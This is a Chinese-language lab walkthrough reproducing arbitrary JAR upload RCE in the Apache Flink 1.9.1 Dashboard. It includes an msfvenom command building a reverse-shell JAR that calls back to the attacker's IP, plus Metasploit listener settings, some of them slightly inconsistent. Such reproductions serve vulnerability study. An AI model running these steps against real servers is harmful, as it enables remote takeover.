您好,登錄后才能下訂單哦!
這篇文章主要為大家展示了“Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析”,內容簡而易懂,條理清晰,希望能夠幫助大家解決疑惑,下面讓小編帶領大家一起研究并學習一下“Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析”這篇文章吧。
Apache Flink是近幾年大火的數據處理引擎。受到各大廠商的推崇并且已經應用與實際的業(yè)務場景中。很多公司在進行選型的時候都會選擇Apache Flink作為選型的對象。
Apache Flink能用來做什么?
實時推薦系統(tǒng)
實時報表
實時數倉與ETL
復雜事件處理
實時欺詐與實時信用評估
大數據安全監(jiān)測
Flink核心是一個流式的數據流執(zhí)行引擎,其針對數據流的分布式計算提供了數據分布、數據通信以及容錯機制等功能?;诹鲌?zhí)行引擎,Flink提供了諸多更高抽象層的API以便用戶編寫分布式任務。
攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執(zhí)行的目的
至目前Apache Flink 1.9.1版本
攻擊機kali:192.168.10.147
受害機Ubuntu:192.168.10.176
測試環(huán)境:Flink 1.9.1 java8+
Apache Flink 1.9.1安裝包下載:
https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
下載完成后使用解壓
tar zxvf flink-1.9.1-bin-scala_2.11.tgz
進入bin目錄運行./start-cluster.sh啟動環(huán)境
環(huán)境搭建成功 目標站點 http://192.168.10.176:8081
使用kali生成jar后門包
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar
攻擊機訪問目標站點 并上傳shell.jar
使用kali配置監(jiān)聽
use exploit/multi/handler
set payload java/shell/reverse_tcp
set RHOST 192.168.10.147
set LPORT 2020
run
點開剛剛上傳的shell.jar,觸發(fā)漏洞
更新官網補丁或更新最新版本
以上是“Apache Flink任意Jar包上傳致RCE漏洞復現的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注億速云行業(yè)資訊頻道!
免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。